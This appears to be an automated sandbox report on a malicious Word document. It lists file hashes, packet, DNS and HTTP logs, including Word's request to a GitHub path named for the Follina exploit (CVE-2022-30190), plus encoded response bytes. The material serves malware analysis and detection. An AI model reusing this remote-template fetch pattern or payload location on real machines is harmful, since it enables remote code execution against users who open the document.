                                                                                                                                                                                                                                        File type:Microsoft OOXML
                                                                                                                                                                                                                                        Entropy (8bit):7.869840361272895
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                                                                                                        • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                                                                                                        • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                                                                                                        File name:dl18aYTBo5.docx
                                                                                                                                                                                                                                        File size:10190
                                                                                                                                                                                                                                        MD5:b91615355a11f5bb8b7c381a8bc4485a
                                                                                                                                                                                                                                        SHA1:7950b1730e05a2dcdd19f1a98a697798a9edbf77
                                                                                                                                                                                                                                        SHA256:3fdd30eb0961c98259d58327745ec253588b1553d9822d613d45d076c4b07ec1
                                                                                                                                                                                                                                        SHA512:c8fbe110484db356ff4f67bcad94930b26fab9040a560a5a0d466d5766b2430b64585132048f787f0c7766b12e33ab765d415bd08a5fb7482a12d1da9160a00a
                                                                                                                                                                                                                                        SSDEEP:192:E5VR2DuRkZx41Jlb8VPkf+CFk4v1Y2VveFLC9Fi/CRQIZleDM:EHkZx0lD9+2Vv6aRdleDM
                                                                                                                                                                                                                                        TLSH:73229D3BEAA50DB4C6E69275E0AC1A25C35C06B7F33DF94A349423D812C85DD5BE530C
                                                                                                                                                                                                                                        File Content Preview:PK.........C.T...L....'.......[Content_Types].xml...n.0.E....m.NR....,.X...~...`.l.....C ......l....sg..'.m..kp^...Q4d...H..1.X...,.(.......x6..L.;.>.b.c.!...}.A!|d,h.....i.....K,....;....1.R.M'O..U....^WF.....Ub....6W.@.....(aM..r..3e....?J(#....7..S...p
                                                                                                                                                                                                                                        Icon Hash:74fcd0d2d6d6d0cc
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.620351076 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.620439053 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.620496035 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.620510101 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.620980978 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.621049881 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.621067047 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.621174097 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.621242046 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.621253967 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.621484995 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.621555090 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.630376101 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.674331903 CEST49705443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.674370050 CEST44349705185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.674452066 CEST49705443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.674659967 CEST49705443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.674670935 CEST44349705185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.709250927 CEST44349705185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.725590944 CEST49705443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.726998091 CEST49705443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.727076054 CEST44349705185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.863574028 CEST44349705185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.863698006 CEST44349705185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.863776922 CEST49705443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.872134924 CEST49705443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.872164965 CEST44349705185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.872226954 CEST49705443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.872239113 CEST44349705185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.909831047 CEST49706443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.909883976 CEST44349706185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.910011053 CEST49706443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.910334110 CEST49706443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.910356045 CEST44349706185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.943308115 CEST44349706185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.943865061 CEST49706443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.945125103 CEST49706443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.945167065 CEST44349706185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.982552052 CEST44349706185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.982861042 CEST44349706185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.982942104 CEST44349706185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.982981920 CEST49706443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.983009100 CEST44349706185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.983023882 CEST49706443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.983056068 CEST49706443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.983109951 CEST49706443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.067408085 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.067440033 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.067512989 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.068056107 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.068075895 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.104702950 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.104819059 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.104931116 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.116708040 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.117278099 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.117353916 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.117887020 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.159363985 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290308952 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290421963 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290438890 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290498972 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290505886 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290529966 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290565968 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290616035 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290623903 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290676117 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290687084 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290705919 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290743113 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290779114 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290783882 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290810108 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290844917 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290877104 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.297817945 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.297841072 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.482681990 CEST49708443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.482744932 CEST44349708185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.482848883 CEST49708443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.483077049 CEST49708443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.483098030 CEST44349708185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.517188072 CEST44349708185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.517290115 CEST49708443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.517765045 CEST49708443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.520457983 CEST49708443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.520509005 CEST44349708185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.547281027 CEST44349708185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.547430992 CEST44349708185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.547568083 CEST49708443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.692361116 CEST44349714185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.692486048 CEST49714443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.692507982 CEST44349714185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.692529917 CEST49714443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.692563057 CEST44349714185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.692608118 CEST49714443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.692666054 CEST49714443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.711343050 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.711412907 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.711551905 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.711844921 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.711879015 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.747437954 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.747697115 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.748193979 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.751252890 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.751323938 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777409077 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777549982 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777582884 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777648926 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777663946 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777731895 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777746916 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777808905 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777822971 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777884960 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777899027 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777964115 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.777976990 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.778038979 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.778100014 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.778177023 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.823604107 CEST49715443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:10.823662996 CEST44349715185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.747351885 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.747417927 CEST44349716185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.747524023 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.747744083 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.747762918 CEST44349716185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.783976078 CEST44349716185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.784074068 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.784581900 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.791146994 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.791240931 CEST44349716185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.813627005 CEST44349716185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.813723087 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.813728094 CEST44349716185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.813786030 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.833015919 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.833053112 CEST44349716185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.833065033 CEST49716443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:12.833170891 CEST49716443192.168.2.4185.199.109.133
Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Aug 18, 2022 03:57:05.506854057 CEST  52239        53         192.168.2.4  8.8.8.8
Aug 18, 2022 03:57:05.525362015 CEST  53           52239      8.8.8.8      192.168.2.4
Aug 18, 2022 03:57:09.049834013 CEST  61007        53         192.168.2.4  8.8.8.8
Aug 18, 2022 03:57:09.066267014 CEST  53           61007      8.8.8.8      192.168.2.4
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                       Type            Class
Aug 18, 2022 03:57:05.506854057 CEST  192.168.2.4  8.8.8.8  0x5d75    Standard query (0)  raw.githubusercontent.com  A (IP address)  IN (0x0001)
Aug 18, 2022 03:57:09.049834013 CEST  192.168.2.4  8.8.8.8  0xd5d0    Standard query (0)  raw.githubusercontent.com  A (IP address)  IN (0x0001)
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                       CName  Address          Type            Class
Aug 18, 2022 03:57:05.525362015 CEST  8.8.8.8    192.168.2.4  0x5d75    No error (0)  raw.githubusercontent.com         185.199.108.133  A (IP address)  IN (0x0001)
Aug 18, 2022 03:57:05.525362015 CEST  8.8.8.8    192.168.2.4  0x5d75    No error (0)  raw.githubusercontent.com         185.199.109.133  A (IP address)  IN (0x0001)
Aug 18, 2022 03:57:05.525362015 CEST  8.8.8.8    192.168.2.4  0x5d75    No error (0)  raw.githubusercontent.com         185.199.110.133  A (IP address)  IN (0x0001)
Aug 18, 2022 03:57:05.525362015 CEST  8.8.8.8    192.168.2.4  0x5d75    No error (0)  raw.githubusercontent.com         185.199.111.133  A (IP address)  IN (0x0001)
Aug 18, 2022 03:57:09.066267014 CEST  8.8.8.8    192.168.2.4  0xd5d0    No error (0)  raw.githubusercontent.com         185.199.109.133  A (IP address)  IN (0x0001)
Aug 18, 2022 03:57:09.066267014 CEST  8.8.8.8    192.168.2.4  0xd5d0    No error (0)  raw.githubusercontent.com         185.199.111.133  A (IP address)  IN (0x0001)
Aug 18, 2022 03:57:09.066267014 CEST  8.8.8.8    192.168.2.4  0xd5d0    No error (0)  raw.githubusercontent.com         185.199.108.133  A (IP address)  IN (0x0001)
Aug 18, 2022 03:57:09.066267014 CEST  8.8.8.8    192.168.2.4  0xd5d0    No error (0)  raw.githubusercontent.com         185.199.110.133  A (IP address)  IN (0x0001)
                                                                                                                                                                                                                                        • raw.githubusercontent.com
Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
0           192.168.2.4  49704        185.199.108.133  443               C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp                kBytes transferred  Direction  Data
2022-08-18 01:57:05 UTC  0                   OUT        OPTIONS /drgreenthumb93/CVE-2022-30190-follina/main/ HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Authorization: Bearer
                                                                                                                                                                                                                                        User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                                                                        X-Office-Major-Version: 16
                                                                                                                                                                                                                                        X-MS-CookieUri-Requested: t
                                                                                                                                                                                                                                        X-FeatureVersion: 1
                                                                                                                                                                                                                                        X-MSGETWEBURL: t
                                                                                                                                                                                                                                        X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                                                        Host: raw.githubusercontent.com
2022-08-18 01:57:05 UTC  0                   IN         HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Date: Thu, 18 Aug 2022 01:57:05 GMT
                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                        X-Served-By: cache-mxp6929-MXP
                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                        X-Timer: S1660787826.582963,VS0,VE9
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Fastly-Request-ID: 3ff7e4b791bcf59d1adae5143531aa79a139b0de
                                                                                                                                                                                                                                        Expires: Thu, 18 Aug 2022 02:02:05 GMT
                                                                                                                                                                                                                                        Vary: Authorization,Accept-Encoding
                                                                                                                                                                                                                                        transfer-encoding: chunked
                                                                                                                                                                                                                                        Data Ascii: u0wrBnwX9PsXZ+xdGIyUWPf5ajCWnqqt/16+3nrzRfOPG1q03ILnFpCCLLtwkJBvpIt0VAYGBWkdBLjrzr9L6NN6b4hryu4caCV1HkJB42IkFJCDMYO2BvSLZ+yumIOUIk6EiCLNClFYmK4hUTyXFNRcEXLBb3Gxd6Z7oDEbnkJFoPJa0X4LIj4d2VbVW5RyC2cLzuPW/6aHcUygbNmHzSdA3Vgxk4zsAokRVz/QLoElqspEBQS4BBYFwLPhKRB
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC22INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC22INData Raw: 35 35 61 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 55a
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC22INData Raw: 48 2f 39 44 70 39 39 61 73 45 2f 32 58 37 33 2b 2b 31 6b 72 6b 72 42 41 31 45 76 65 4a 7a 6b 50 49 51 48 4d 51 2b 45 4c 5a 36 52 41 4b 53 47 56 4f 51 65 49 62 6c 73 73 39 70 6f 61 42 46 63 56 4a 78 75 33 48 66 76 36 6a 33 49 51 2f 7a 42 69 32 73 49 54 68 35 30 41 6b 68 4e 44 51 48 35 59 47 64 2f 44 56 6b 73 50 59 6e 63 4e 6b 7a 76 68 65 79 4f 73 50 75 48 6e 31 65 4a 77 37 65 44 69 44 55 71 52 57 7a 52 48 64 73 50 48 44 43 79 59 41 72 79 33 67 38 2f 4d 42 77 35 65 41 77 4c 41 4b 57 2f 42 76 37 38 42 75 4d 68 63 68 43 54 51 43 42 59 6a 73 79 47 33 4a 42 38 6c 6c 79 39 78 51 52 4b 38 64 47 44 68 42 56 69 55 7a 39 36 2f 2b 45 52 43 48 54 6b 31 72 5a 62 75 6f 62 73 73 39 4a 5a 71 5a 50 41 51 45 69 32 66 56 42 47 51 45 71 75 36 6f 6e 39 31 53 4f 44 4a 55 52 45
                                                                                                                                                                                                                                        Data Ascii: H/9Dp99asE/2X73++1krkrBA1EveJzkPIQHMQ+ELZ6RAKSGVOQeIblss9poaBFcVJxu3Hfv6j3IQ/zBi2sITh50AkhNDQH5YGd/DVksPYncNkzvheyOsPuHn1eJw7eDiDUqRWzRHdsPHDCyYAry3g8/MBw5eAwLAKW/Bv78BuMhchCTQCBYjsyG3JB8lly9xQRK8dGDhBViUz96/+ERCHTk1rZbuobss9JZqZPAQEi2fVBGQEqu6on91SODJURE
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC23INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC23INData Raw: 35 35 61 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 55a
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC23INData Raw: 7a 79 61 32 72 75 6b 42 62 4c 71 76 52 78 66 73 55 6e 32 38 32 63 4f 31 6e 51 45 52 79 35 6f 4e 49 4b 77 6e 37 55 4b 41 57 57 78 6f 61 47 67 71 64 30 59 67 73 42 30 4f 71 45 46 70 34 41 68 36 62 51 59 50 6d 47 74 61 72 38 41 42 76 6d 51 4b 79 44 6b 43 30 38 78 30 56 41 78 42 38 61 62 34 50 4a 41 75 44 4b 2f 32 4e 69 49 6a 33 4a 58 79 6f 5a 63 47 6d 63 6d 46 41 38 49 4b 74 75 31 74 78 48 2f 79 59 6c 4a 63 31 35 78 57 53 42 77 6b 4c 48 4c 48 5a 70 38 2b 31 32 50 75 47 4f 75 70 39 71 6c 53 63 4f 7a 42 41 4f 73 4a 34 63 50 30 34 58 47 54 46 4b 4a 65 61 4a 4e 4e 7a 36 2f 52 56 47 6d 7a 79 4a 34 47 4d 78 49 51 50 34 54 4d 2f 58 45 55 61 79 77 59 67 5a 52 55 56 77 36 33 4e 67 33 41 57 51 4c 43 45 49 44 57 35 72 4b 4c 61 30 6b 58 43 6c 4b 53 6d 6c 56 41 78 68 77
                                                                                                                                                                                                                                        Data Ascii: zya2rukBbLqvRxfsUn282cO1nQERy5oNIKwn7UKAWWxoaGgqd0YgsB0OqEFp4Ah6bQYPmGtar8ABvmQKyDkC08x0VAxB8ab4PJAuDK/2NiIj3JXyoZcGmcmFA8IKtu1txH/yYlJc15xWSBwkLHLHZp8+12PuGOup9qlScOzBAOsJ4cP04XGTFKJeaJNNz6/RVGmzyJ4GMxIQP4TM/XEUaywYgZRUVw63Ng3AWQLCEIDW5rKLa0kXClKSmlVAxhw
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC24INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC24INData Raw: 35 35 61 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 55a
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC24INData Raw: 48 4e 41 2b 47 79 76 30 4a 48 42 2b 31 79 67 4b 58 44 75 37 4b 6d 2f 43 76 6d 41 35 46 65 2f 2b 74 56 2f 2f 65 66 2b 6e 64 79 2f 48 57 35 41 74 61 56 43 52 37 4a 2f 4a 37 6b 57 48 67 53 54 62 57 73 75 67 31 64 69 6e 58 53 34 6a 78 4e 52 33 41 67 64 57 38 67 44 4f 4c 36 65 6e 4a 71 61 76 46 44 72 74 79 69 4b 5a 48 50 30 48 75 38 5a 6e 63 56 68 36 62 57 50 73 30 68 69 31 38 39 37 46 52 5a 35 61 6b 51 47 76 79 6e 59 76 6e 33 58 72 6c 30 46 67 2f 68 59 68 41 77 73 6c 43 37 4d 4c 30 36 76 4d 77 56 45 56 45 2b 45 48 38 6b 76 76 62 39 41 42 69 72 67 31 42 48 42 51 72 5a 74 4f 37 49 66 42 6d 78 34 2f 73 48 49 50 39 7a 46 48 55 6f 46 53 41 79 51 33 68 41 4d 7a 64 4d 33 46 78 32 55 32 58 34 41 37 43 55 37 35 63 4b 6d 73 6a 36 38 45 2f 6c 68 37 50 72 6b 31 4d 79 54
                                                                                                                                                                                                                                        Data Ascii: HNA+Gyv0JHB+1ygKXDu7Km/CvmA5Fe/+tV//ef+ndy/HW5AtaVCR7J/J7kWHgSTbWsug1dinXS4jxNR3AgdW8gDOL6enJqavFDrtyiKZHP0Hu8ZncVh6bWPs0hi1897FRZ5akQGvynYvn3Xrl0Fg/hYhAwslC7ML06vMwVEVE+EH8kvvb9ABirg1BHBQrZtO7IfBmx4/sHIP9zFHUoFSAyQ3hAMzdM3Fx2U2X4A7CU75cKmsj68E/lh7Prk1MyT
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC26INData Raw: 0d 0a
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        2022-08-18 01:57:05 UTC26INData Raw: 35 35 61 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 55a
